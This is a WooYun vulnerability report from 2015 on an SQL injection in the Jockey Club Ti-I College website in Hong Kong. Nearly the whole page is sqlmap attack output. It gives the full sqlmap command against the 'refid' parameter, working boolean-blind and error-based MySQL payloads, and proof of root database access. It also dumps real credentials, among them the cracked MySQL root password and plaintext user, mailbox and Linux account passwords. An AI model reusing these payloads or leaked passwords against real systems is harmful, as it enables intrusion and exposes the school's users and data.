当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞


漏洞标题:Jockey Club Ti-I College主站存在SQL注射漏洞(DBA权限+root密码+1000多W网站访问记录+用户明文密码)(香港地區)

相关厂商:Jockey Club Ti-I College

漏洞作者: 路人甲

提交时间:2015-12-03 11:27

修复时间:2015-12-08 11:28

公开时间:2015-12-08 11:28





漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]


4人收藏 收藏



2015-12-03: 细节已通知厂商并且等待厂商处理中
2015-12-08: 厂商已经主动忽略漏洞,细节向公众公开


Jockey Club Ti-I College主站存在SQL注射漏洞(DBA权限+root密码+1000多W网站访问记录+用户明文密码)



$ python sqlmap.py -u "http://**.**.**.**/it-school/php/webcms/public/index.php3?refid=1104&mode=published&lang=en&nocache1402373480" -p refid --technique=BE --random-agent --batch  --no-cast --current-user --is-dba --users --passwords --cunt --search -C pass --output-dir=output

current user:    'root@localhost'
current user is DBA: True
database management system users [5]:
[*] ''@'localhost'
[*] ''@'localhost.localdomain'
[*] 'root'@'**.**.**.**'
[*] 'root'@'localhost'
[*] 'root'@'localhost.localdomain'
database management system users password hashes:
[*] root [2]:
password hash: *0CB5F227B3E98395CA0C6F1427427E77ADF49F89
clear-text password: 1234qwer
password hash: NULL

Database: itschool
| Table | Entries |
| webcms_counter | 16140429 |
Database: itschool
Table: webcms_counter
[4 columns]
| Column | Type |
| countid | int(11) |
| ip | varchar(20) |
| visitday | date |
| visittime | time |

Database: itschool
Table: ituser
[13 entries]
| password |
| 1234 |
| 1qa3ed5tg |
| 321 |
| 321 |
| 6ymrrrzm |
| gmnngmg3 |
| itschool |
| killyouyeah1 |
| ltc |
| road2002 |
| test01_t |
| z3459315 |
| z8322822 |


Parameter: refid (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: refid=1104 RLIKE (SELECT (CASE WHEN (8072=8072) THEN 1104 ELSE 0x28 END))&mode=published&lang=en&nocache1402373480
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: refid=1104 AND (SELECT 8375 FROM(SELECT COUNT(*),CONCAT(0x7162717171,(SELECT (ELT(8375=8375,1))),0x7176627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&mode=published&lang=en&nocache1402373480
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0
current user: 'root@localhost'
current user is DBA: True
database management system users [5]:
[*] ''@'localhost'
[*] ''@'localhost.localdomain'
[*] 'root'@'**.**.**.**'
[*] 'root'@'localhost'
[*] 'root'@'localhost.localdomain'
database management system users password hashes:
[*] root [2]:
password hash: *0CB5F227B3E98395CA0C6F1427427E77ADF49F89
clear-text password: 1234qwer
password hash: NULL
Database: itschool
| Table | Entries |
| webcms_counter | 16140429 |
| photo | 5414 |
| logbook | 2017 |
| webcms_item_component | 399 |
| webcms_page_temp_template | 359 |
| webcms_page_temp_content | 342 |
| webcms_page_content | 334 |
| webcms_latest_news | 255 |
| webcms_page_template | 247 |
| ecard_datafile | 246 |
| webcms_item_page_status | 239 |
| privilege | 184 |
| webcms_items | 184 |
| menuitem | 149 |
| ecard | 118 |
| mingpao_prize | 106 |
| page_privilege | 101 |
| actionlog | 81 |
| mingpao_news_forum_word_filter | 71 |
| mingpao_usergroup_privilege | 69 |
| webcms_remarks | 69 |
| photoalbum | 67 |
| webcms_upload_files | 57 |
| myid_module | 51 |
| webcms_link_content | 46 |
| webcms_page_content_list | 45 |
| webcms_latest_news_attachment | 35 |
| menucat | 30 |
| usergroup_privilege | 25 |
| mingpao_engine_rule | 24 |
| sch_leave | 21 |
| webcms_album | 20 |
| myit_schoolsubject | 18 |
| webcms_waiting_publish | 17 |
| mingpao_scoring | 16 |
| webcms_template_detail | 16 |
| mingpao_rank | 15 |
| ecard_type | 13 |
| ituser | 13 |
| user_usergroup | 13 |
| userlog | 13 |
| userprofile | 13 |
| webcms_top_banner | 13 |
| changjie_certificate | 12 |
| mingpao_privilege | 12 |
| parent_notice_questionnaire | 12 |
| rss_reader_user | 12 |
| webcms_cal | 12 |
| webcms_mini_banner | 12 |
| webcms_newbanner | 12 |
| changjie_level | 10 |
| mingpao_news_forum_face | 10 |
| webcms_indexbannerslide | 10 |
| sch_leavecat | 9 |
| webcms_template_info | 8 |
| changjie_user_grade | 6 |
| mail_folder | 6 |
| mail_restrict_recipient_permission | 6 |
| mingpao_box_myid_link | 6 |
| mingpao_news_type | 6 |
| mingpao_user_read_level | 6 |
| photoalbum_lastview | 6 |
| resdb_url | 6 |
| usergroup | 6 |
| wid_template | 6 |
| changjie_mission | 5 |
| tvs_channel_template | 5 |
| imap_mailbox | 4 |
| mingpao_box | 4 |
| mingpao_usergroup | 4 |
| parent_notice | 4 |
| webcms_schdirection | 4 |
| webcms_schdocument | 4 |
| changjie_settings | 3 |
| mingpao_news_forum_topic_template | 3 |
| mingpao_read_level | 3 |
| myid_lock_status | 3 |
| myid_msg_centre_module_setting | 3 |
| mysql_sessions | 3 |
| parent_notice_file | 3 |
| sch_leaveapplicationform | 3 |
| webcms_motto_of_this_week | 3 |
| webcms_motto_of_this_week1 | 3 |
| changjie_grade | 2 |
| changjie_notice | 2 |
| frontpagenotice_read_record | 2 |
| linuxsys_useraccountquota | 2 |
| login_language_type | 2 |
| parent_news_group | 2 |
| parent_notice_content | 2 |
| parent_notice_read | 2 |
| parent_notice_users | 2 |
| parent_notice_users_alias | 2 |
| photoalbum_quota | 2 |
| resdb_readonly | 2 |
| sch_semester | 2 |
| school_calendar | 2 |
| webcms_main_banner | 2 |
| webcms_public_newsboard | 2 |
| attend_basic_info | 1 |
| attend_pic | 1 |
| attend_smart_final_record | 1 |
| cal_preference | 1 |
| disforum_cat | 1 |
| disforum_forum | 1 |
| disforum_master | 1 |
| disforum_privilege | 1 |
| mailsize | 1 |
| mingpao_student_box | 1 |
| mingpao_user | 1 |
| myit_modulefunction | 1 |
| newscategory | 1 |
| parent_news | 1 |
| parent_news_read | 1 |
| parent_news_read_record | 1 |
| parent_notice_user_reply | 1 |
| perdb_quota | 1 |
| perhp_quota | 1 |
| resdb_admin | 1 |
| resdb_folder | 1 |
| resdbgroup_quota | 1 |
| resource_setting | 1 |
| rss_reader | 1 |
| sch_info | 1 |
| sch_year | 1 |
| tvs_mode | 1 |
| tvs_setting | 1 |
| user_widget | 1 |
| webcms_honor_list | 1 |
| webcms_message_announce | 1 |
| webcms_weekly_message | 1 |
| wid_setting | 1 |
| ws_ticket | 1 |
Database: itschool_bak
| Table | Entries |
| photo | 16663 |
| webcms_counter | 6755 |
| ecard_datafile | 246 |
| photoalbum | 233 |
| webcms_item_component | 217 |
| webcms_page_temp_template | 192 |
| webcms_page_temp_content | 190 |
| webcms_page_content | 185 |
| privilege | 184 |
| menuitem | 149 |
| ecard | 118 |
| webcms_page_template | 107 |
| mingpao_prize | 106 |
| usergroup_privilege | 105 |
| page_privilege | 101 |
| webcms_items | 98 |
| webcms_latest_news | 96 |
| mingpao_news_forum_word_filter | 71 |
| mingpao_usergroup_privilege | 69 |
| webcms_upload_files | 57 |
| myid_module | 51 |
| webcms_remarks | 48 |
| webcms_page_content_list | 45 |
| menucat | 30 |
| webcms_link_content | 25 |
| mingpao_engine_rule | 24 |
| sch_leave | 21 |
| webcms_latest_news_attachment | 21 |
| myit_schoolsubject | 18 |
| mingpao_scoring | 16 |
| mingpao_rank | 15 |
| logbook | 14 |
| webcms_template_detail | 14 |
| ecard_type | 13 |
| changjie_certificate | 12 |
| mingpao_privilege | 12 |
| rss_reader_user | 12 |
| webcms_album | 12 |
| webcms_cal | 12 |
| webcms_mini_banner | 12 |
| changjie_level | 10 |
| mingpao_news_forum_face | 10 |
| webcms_indexbannerslide | 10 |
| photoalbum_lastview | 9 |
| sch_leavecat | 9 |
| webcms_newbanner | 9 |
| webcms_template_info | 8 |
| changjie_user_grade | 6 |
| mail_folder | 6 |
| mail_restrict_recipient_permission | 6 |
| mingpao_box_myid_link | 6 |
| mingpao_news_type | 6 |
| mingpao_user_read_level | 6 |
| resdb_url | 6 |
| usergroup | 6 |
| wid_template | 6 |
| changjie_mission | 5 |
| tvs_channel_template | 5 |
| webcms_top_banner | 5 |
| imap_mailbox | 4 |
| mingpao_box | 4 |
| mingpao_usergroup | 4 |
| webcms_schdirection | 4 |
| webcms_schdocument | 4 |
| changjie_settings | 3 |
| mingpao_news_forum_topic_template | 3 |
| mingpao_read_level | 3 |
| myid_lock_status | 3 |
| sch_leaveapplicationform | 3 |
| webcms_motto_of_this_week | 3 |
| webcms_motto_of_this_week1 | 3 |
| changjie_grade | 2 |
| changjie_notice | 2 |
| ituser | 2 |
| linuxsys_useraccountquota | 2 |
| login_language_type | 2 |
| resdb_readonly | 2 |
| school_calendar | 2 |
| user_usergroup | 2 |
| webcms_main_banner | 2 |
| webcms_public_newsboard | 2 |
| webcms_waiting_publish | 2 |
| attend_basic_info | 1 |
| attend_pic | 1 |
| attend_smart_final_record | 1 |
| disforum_cat | 1 |
| disforum_forum | 1 |
| disforum_master | 1 |
| disforum_privilege | 1 |
| mailsize | 1 |
| mingpao_student_box | 1 |
| mingpao_user | 1 |
| myit_modulefunction | 1 |
| newscategory | 1 |
| perdb_quota | 1 |
| perhp_quota | 1 |
| photoalbum_quota | 1 |
| resdb_admin | 1 |
| resdb_folder | 1 |
| resdbgroup_quota | 1 |
| resource_setting | 1 |
| rss_reader | 1 |
| tvs_mode | 1 |
| tvs_setting | 1 |
| user_widget | 1 |
| userlog | 1 |
| userprofile | 1 |
| webcms_honor_list | 1 |
| webcms_message_announce | 1 |
| webcms_weekly_message | 1 |
| wid_setting | 1 |
Database: information_schema
| Table | Entries |
| COLUMNS | 13634 |
| STATISTICS | 4256 |
| TABLES | 2505 |
| PARTITIONS | 2504 |
| COLLATIONS | 129 |
| PLUGINS | 7 |
| ENGINES | 5 |
| SCHEMATA | 5 |
Database: mysql
| Table | Entries |
| help_relation | 1009 |
| help_topic | 510 |
| help_keyword | 453 |
| help_category | 40 |
| `user` | 5 |
| db | 2 |
columns LIKE 'pass' were found in the following databases:
Database: itschool
Table: imap_mailbox
[1 column]
| Column | Type |
| password | varchar(50) |
Database: itschool
Table: alumni_waiting_approval_user
[1 column]
| Column | Type |
| password | varchar(20) |
Database: itschool
Table: qbankexecrise
[1 column]
| Column | Type |
| passingmark | float |
Database: itschool
Table: linuxsys_useraccountquota
[1 column]
| Column | Type |
| linuxPassword | varchar(50) |
Database: itschool
Table: ecpstestex
[1 column]
| Column | Type |
| passingmark | int(11) |
Database: itschool
Table: delete_user_pool
[1 column]
| Column | Type |
| password | varchar(50) |
Database: itschool
Table: ytcps_net_reading_passage_circle
[3 columns]
| Column | Type |
| passage_dttm | datetime |
| passage_dttm_end | datetime |
| passage_id | int(11) |
Database: itschool
Table: ecpstestex_temp
[1 column]
| Column | Type |
| passingmark | int(11) |
Database: itschool
Table: qbankqpaper_temp
[1 column]
| Column | Type |
| passingmark | float |
Database: itschool
Table: qbankqpaper
[1 column]
| Column | Type |
| passingmark | float |
Database: itschool
Table: qbankdoconlinetest_temp
[1 column]
| Column | Type |
| passingmark | float |
Database: itschool
Table: qbankdoconlinetest
[1 column]
| Column | Type |
| passingmark | float |
Database: itschool
Table: ytcps_net_reading_passage_content
[1 column]
| Column | Type |
| passage_id | int(11) |
Database: itschool
Table: ers_reading_book_map
[1 column]
| Column | Type |
| passingmark | float |
Database: itschool
Table: ituser
[1 column]
| Column | Type |
| password | varchar(50) |
Database: itschool
Table: ytcps_net_reading_paper
[1 column]
| Column | Type |
| passingmark | int(11) |
Database: itschool
Table: itpark_levels
[1 column]
| Column | Type |
| passing_points | tinyint(4) |
Database: itschool
Table: alumni_user_info
[1 column]
| Column | Type |
| password | varchar(20) |
Database: itschool
Table: ytcps_net_reading_passage
[1 column]
| Column | Type |
| passage_id | int(11) |
Database: itschool
Table: mail_external_filter_log
[1 column]
| Column | Type |
| pass | int(11) |
Database: itschool
Table: ex_school
[1 column]
| Column | Type |
| db_password | varchar(255) |
Database: itschool
Table: flashchirecords
[1 column]
| Column | Type |
| passed | enum('Y','N') |
Database: itschool
Table: ers_reading_paper
[1 column]
| Column | Type |
| passingmark | float |
Database: itschool
Table: perdbfolder
[1 column]
| Column | Type |
| password | varchar(8) |
Database: itschool
Table: linuxsys_server
[3 columns]
| Column | Type |
| passwd | varchar(50) |
| password | varchar(50) |
| suPassword | varchar(50) |
Database: itschool
Table: ers_reading_report
[1 column]
| Column | Type |
| is_passed | char(1) |
Database: itschool
Table: ytcps_net_reading_report
[1 column]
| Column | Type |
| is_passed | char(1) |
Database: itschool_bak
Table: imap_mailbox
[1 column]
| Column | Type |
| password | varchar(50) |
Database: itschool_bak
Table: alumni_waiting_approval_user
[1 column]
| Column | Type |
| password | varchar(20) |
Database: itschool_bak
Table: qbankexecrise
[1 column]
| Column | Type |
| passingmark | float |
Database: itschool_bak
Table: linuxsys_useraccountquota
[1 column]
| Column | Type |
| linuxPassword | varchar(50) |
Database: itschool_bak
Table: ecpstestex
[1 column]
| Column | Type |
| passingmark | int(11) |
Database: itschool_bak
Table: delete_user_pool
[1 column]
| Column | Type |
| password | varchar(50) |
Database: itschool_bak
Table: ytcps_net_reading_passage_circle
[3 columns]
| Column | Type |
| passage_dttm | datetime |
| passage_dttm_end | datetime |
| passage_id | int(11) |
Database: itschool_bak
Table: ecpstestex_temp
[1 column]
| Column | Type |
| passingmark | int(11) |
Database: itschool_bak
Table: qbankqpaper_temp
[1 column]
| Column | Type |
| passingmark | float |
Database: itschool_bak
Table: qbankqpaper
[1 column]
| Column | Type |
| passingmark | float |
Database: itschool_bak
Table: qbankdoconlinetest_temp
[1 column]
| Column | Type |
| passingmark | float |
Database: itschool_bak
Table: qbankdoconlinetest
[1 column]
| Column | Type |
| passingmark | float |
Database: itschool_bak
Table: ytcps_net_reading_passage_content
[1 column]
| Column | Type |
| passage_id | int(11) |
Database: itschool_bak
Table: ers_reading_book_map
[1 column]
| Column | Type |
| passingmark | float |
Database: itschool_bak
Table: ituser
[1 column]
| Column | Type |
| password | varchar(50) |
Database: itschool_bak
Table: ytcps_net_reading_paper
[1 column]
| Column | Type |
| passingmark | int(11) |
Database: itschool_bak
Table: itpark_levels
[1 column]
| Column | Type |
| passing_points | tinyint(4) |
Database: itschool_bak
Table: alumni_user_info
[1 column]
| Column | Type |
| password | varchar(20) |
Database: itschool_bak
Table: ytcps_net_reading_passage
[1 column]
| Column | Type |
| passage_id | int(11) |
Database: itschool_bak
Table: mail_external_filter_log
[1 column]
| Column | Type |
| pass | int(11) |
Database: itschool_bak
Table: ex_school
[1 column]
| Column | Type |
| db_password | varchar(255) |
Database: itschool_bak
Table: flashchirecords
[1 column]
| Column | Type |
| passed | enum('Y','N') |
Database: itschool_bak
Table: ers_reading_paper
[1 column]
| Column | Type |
| passingmark | float |
Database: itschool_bak
Table: perdbfolder
[1 column]
| Column | Type |
| password | varchar(8) |
Database: itschool_bak
Table: linuxsys_server
[3 columns]
| Column | Type |
| passwd | varchar(50) |
| password | varchar(50) |
| suPassword | varchar(50) |
Database: itschool_bak
Table: ers_reading_report
[1 column]
| Column | Type |
| is_passed | char(1) |
Database: itschool_bak
Table: ytcps_net_reading_report
[1 column]
| Column | Type |
| is_passed | char(1) |
Database: mysql
Table: user
[1 column]
| Column | Type |
| Password | char(41) |
Database: mysql
Table: servers
[1 column]
| Column | Type |
| Password | char(64) |
Database: itschool
Table: imap_mailbox
[4 entries]
| password |
| |
| |
| 4rf6yh8ik |
| itschool |
Database: itschool
Table: alumni_waiting_approval_user
[0 entries]
| password |
Database: itschool
Table: qbankexecrise
[0 entries]
| passingmark |
Database: itschool
Table: linuxsys_useraccountquota
[2 entries]
| linuxPassword |
| 4rf6yh8ik |
| itschool |
Database: itschool
Table: delete_user_pool
[0 entries]
| password |
Database: itschool
Table: ecpstestex
[0 entries]
| passingmark |
Database: itschool
Table: ytcps_net_reading_passage_circle
[0 entries]
| passage_dttm | passage_dttm_end | passage_id |
Database: itschool
Table: ecpstestex_temp
[0 entries]
| passingmark |
Database: itschool
Table: qbankqpaper_temp
[0 entries]
| passingmark |
Database: itschool
Table: qbankqpaper
[0 entries]
| passingmark |
Database: itschool
Table: qbankdoconlinetest_temp
[0 entries]
| passingmark |
Database: itschool
Table: qbankdoconlinetest
[0 entries]
| passingmark |
Database: itschool
Table: ytcps_net_reading_passage_content
[0 entries]
| passage_id |
Database: itschool
Table: ers_reading_book_map
[0 entries]
| passingmark |
Database: itschool
Table: ituser
[13 entries]
| password |
| 1234 |
| 1qa3ed5tg |
| 321 |
| 321 |
| 6ymrrrzm |
| gmnngmg3 |
| itschool |
| killyouyeah1 |
| ltc |
| road2002 |
| test01_t |
| z3459315 |
| z8322822 |
Database: itschool
Table: ytcps_net_reading_paper
[0 entries]
| passingmark |
Database: itschool
Table: itpark_levels
[0 entries]
| passing_points |
Database: itschool
Table: alumni_user_info
[0 entries]
| password |
Database: itschool
Table: ytcps_net_reading_passage
[0 entries]
| passage_id |
Database: itschool
Table: mail_external_filter_log
[0 entries]
| pass |
Database: itschool
Table: ex_school
[0 entries]
| db_password |
Database: itschool
Table: flashchirecords
[0 entries]
| passed |
Database: itschool
Table: ers_reading_paper
[0 entries]
| passingmark |
Database: itschool
Table: perdbfolder
[0 entries]
| password |
Database: itschool
Table: linuxsys_server
[0 entries]
| passwd | password | suPassword |
Database: itschool
Table: ers_reading_report
[0 entries]
| is_passed |
Database: itschool
Table: ytcps_net_reading_report
[0 entries]
| is_passed |
Database: itschool_bak
Table: imap_mailbox
[4 entries]
| password |
| |
| |
| 4rf6yh8ik |
| itschool |
Database: itschool_bak
Table: alumni_waiting_approval_user
[0 entries]
| password |
Database: itschool_bak
Table: qbankexecrise
[0 entries]
| passingmark |
Database: itschool_bak
Table: linuxsys_useraccountquota
[2 entries]
| linuxPassword |
| 4rf6yh8ik |
| itschool |
Database: itschool_bak
Table: delete_user_pool
[0 entries]
| password |
Database: itschool_bak
Table: ecpstestex
[0 entries]
| passingmark |
Database: itschool_bak
Table: ytcps_net_reading_passage_circle
[0 entries]
| passage_dttm | passage_dttm_end | passage_id |
Database: itschool_bak
Table: ecpstestex_temp
[0 entries]
| passingmark |
Database: itschool_bak
Table: qbankqpaper_temp
[0 entries]
| passingmark |
Database: itschool_bak
Table: qbankqpaper
[0 entries]
| passingmark |
Database: itschool_bak
Table: qbankdoconlinetest_temp
[0 entries]
| passingmark |
Database: itschool_bak
Table: qbankdoconlinetest
[0 entries]
| passingmark |
Database: itschool_bak
Table: ytcps_net_reading_passage_content
[0 entries]
| passage_id |
Database: itschool_bak
Table: ers_reading_book_map
[0 entries]
| passingmark |
Database: itschool_bak
Table: ituser
[2 entries]
| password |
| 1qa3ed5tg |
| itschool |
Database: itschool_bak
Table: ytcps_net_reading_paper
[0 entries]
| passingmark |
Database: itschool_bak
Table: itpark_levels
[0 entries]
| passing_points |
Database: itschool_bak
Table: alumni_user_info
[0 entries]
| password |
Database: itschool_bak
Table: ytcps_net_reading_passage
[0 entries]
| passage_id |
Database: itschool_bak
Table: mail_external_filter_log
[0 entries]
| pass |
Database: itschool_bak
Table: ex_school
[0 entries]
| db_password |
Database: itschool_bak
Table: flashchirecords
[0 entries]
| passed |
Database: itschool_bak
Table: ers_reading_paper
[0 entries]
| passingmark |
Database: itschool_bak
Table: perdbfolder
[0 entries]
| password |
Database: itschool_bak
Table: linuxsys_server
[0 entries]
| passwd | password | suPassword |
Database: itschool_bak
Table: ers_reading_report
[0 entries]
| is_passed |
Database: itschool_bak
Table: ytcps_net_reading_report
[0 entries]
| is_passed |
Database: mysql
Table: user
[5 entries]
| Password |
| *0CB5F227B3E98395CA0C6F1427427E77ADF49F89 (1234qwer) |
Database: mysql
Table: servers
[0 entries]
| Password |
sqlmap resumed the following injection point(s) from stored session:
Parameter: refid (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: refid=1104 RLIKE (SELECT (CASE WHEN (8072=8072) THEN 1104 ELSE 0x28 END))&mode=published&lang=en&nocache1402373480
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: refid=1104 AND (SELECT 8375 FROM(SELECT COUNT(*),CONCAT(0x7162717171,(SELECT (ELT(8375=8375,1))),0x7176627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&mode=published&lang=en&nocache1402373480
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0
Database: itschool
Table: webcms_counter
[4 columns]
| Column | Type |
| countid | int(11) |
| ip | varchar(20) |
| visitday | date |
| visittime | time |



版权声明:转载请注明来源 路人甲@乌云




忽略时间:2015-12-08 11:28


